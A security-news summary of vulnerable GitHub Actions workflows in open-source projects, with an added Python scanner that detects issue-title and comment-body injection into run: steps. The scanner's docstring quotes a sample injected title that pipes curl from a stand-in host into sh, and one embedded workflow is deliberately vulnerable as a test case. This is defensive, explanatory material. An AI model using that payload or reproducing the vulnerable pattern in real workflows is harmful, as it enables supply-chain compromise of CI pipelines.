"Vulnerabilities Found in Popular Open-Source Projects on GitHub Could Impact Millions"

Cycode researchers discovered critical vulnerabilities in several popular open-source projects that could lead to a supply chain attack through the Continuous Integration (CI) process. According to the researchers, the vulnerabilities exist in misconfigured GitHub Actions workflows and could affect millions of potential victims. The affected workflows lacked proper input sanitization: attacker-controlled text, such as issue titles and comment bodies, was interpolated directly into build scripts, allowing threat actors to inject code into builds simply by opening issues or posting comments, and from there to access the privileged tokens available to the workflow. The most popular repositories found to be vulnerable include Liquibase, Dynamo BIM, FaunaDB, Wire, Astro, Kogito, and Ombi. While Log4j was making headlines over the past several months, over 4,000 high-severity vulnerabilities were announced, according to Ratan Tipirneni, the president and CEO at Tigera. Tipirneni highlighted that Cycode's recent discovery of critical vulnerabilities in popular open-source projects further indicates there will be an increase in vulnerabilities and threats as the pace of innovation and the use of open-source libraries grow. This finding is also an alarming sign for already constrained security and DevOps teams. Tipirneni pointed out that it is almost impossible for DevOps or security teams to keep up with the changing tactics of attackers. In order to address this security gap, businesses are urged to adopt a defense-in-depth approach. This article continues to discuss the Cycode researchers' discovery of critical vulnerabilities in open-source projects on GitHub and what businesses should do to actively mitigate security risks.
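To make the misconfiguration concrete, the following is an added example, not code from Cycode, SC Media, or any of the projects named above. It is a small, stdlib-only Python scanner that reads GitHub Actions workflow text and flags the two weaknesses the summary describes: untrusted event data (issue titles, comment bodies, and similar fields) expanded inside a `run:` shell step, and the absence of a `permissions:` block that would limit the job's GITHUB_TOKEN. The two workflows embedded in the script are constructed for illustration; the list of untrusted contexts follows GitHub's own Actions security-hardening guidance and is assumed here to be representative, not exhaustive.

```python
"""Flag workflow-injection risks in GitHub Actions workflow text.

Added illustration (not from the article or the named projects):
1. attacker-controlled event fields interpolated into a `run:` script;
2. no `permissions:` block, so GITHUB_TOKEN keeps the repository default.
Line-oriented scan, no YAML parser: assumes conventionally indented files.
"""
import re

# Contexts GitHub documents as attacker-controllable (assumed representative,
# not exhaustive): titles, bodies, branch names, commit messages, authors.
UNTRUSTED_CONTEXTS = re.compile(
    r"""github\.(
        head_ref
      | event\.(
            issue\.(title|body)
          | pull_request\.(title|body|head\.(ref|label))
          | (comment|review|review_comment|discussion)\.(title|body)
          | (head_commit|commits\[\d*\]|commits\.\*)\.(message|author\.(name|email))
          | pages\.\*\.page_name
        )
    )""",
    re.VERBOSE,
)
EXPRESSION = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
RUN_KEY = re.compile(r"^(\s*)(?:-\s+)?run:\s*(?P<value>.*)$")
PERMISSIONS_KEY = re.compile(r"^\s*permissions:\s*(?P<value>.*)$")


def run_script_lines(workflow_text):
    """Yield (line_no, text) for every line that belongs to a run: script."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        value = m.group("value").strip()
        if value and value[0] not in "|>":
            yield i + 1, value  # single-line script
            i += 1
            continue
        # Block scalar: script continues while lines are indented deeper
        # than the `run:` key itself (blank lines stay inside the block).
        key_indent = lines[i].index("run:")
        i += 1
        while i < len(lines) and (
            not lines[i].strip()
            or len(lines[i]) - len(lines[i].lstrip()) > key_indent
        ):
            if lines[i].strip():
                yield i + 1, lines[i]
            i += 1


def find_injections(workflow_text):
    """Return [(line_no, expression)] for untrusted contexts inside run: steps.

    Expressions are expanded by the runner *before* the shell starts, so an
    issue title such as  x"; curl evil.example | sh; echo "  becomes part of
    the command line.  Passing the value through `env:` instead keeps it data.
    """
    findings = []
    for line_no, text in run_script_lines(workflow_text):
        for expr in EXPRESSION.findall(text):
            if UNTRUSTED_CONTEXTS.search(expr):
                findings.append((line_no, expr))
    return findings


def has_scoped_permissions(workflow_text):
    """True if a permissions: block is declared and is not write-all."""
    for line in workflow_text.splitlines():
        m = PERMISSIONS_KEY.match(line)
        if m:
            return m.group("value").strip() != "write-all"
    return False


# Constructed vulnerable workflow: issue title and body land in the script,
# and no permissions: block restricts the token the job receives.
VULNERABLE = """\
name: triage
on:
  issues:
    types: [opened]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - run: echo "New issue: ${{ github.event.issue.title }}"
      - run: |
          echo "Opened by ${{ github.event.issue.user.login }}"
          echo "${{ github.event.issue.body }}" > body.txt
"""

# Constructed hardened form: untrusted text enters via env: so the shell sees
# it only as a variable's value, and the token is scoped to issues: write.
HARDENED = """\
name: triage
on:
  issues:
    types: [opened]
permissions:
  issues: write
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - env:
          TITLE: ${{ github.event.issue.title }}
          BODY: ${{ github.event.issue.body }}
        run: |
          echo "New issue: $TITLE"
          printf '%s\\n' "$BODY" > body.txt
"""

if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(name, find_injections(text), has_scoped_permissions(text))
```

Run against the vulnerable workflow, the scanner reports the title on line 9 and the body on line 12 while ignoring `github.event.issue.user.login`, which GitHub does not list as attacker-controllable; the hardened workflow produces no findings and declares a scoped token. Pointing the same functions at `.github/workflows/*.yml` in a checkout is the quick check a reviewer would want before trusting a workflow that runs on `issues` or `issue_comment` events.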

SC Media reports "Vulnerabilities Found in Popular Open-Source Projects on GitHub Could Impact Millions"
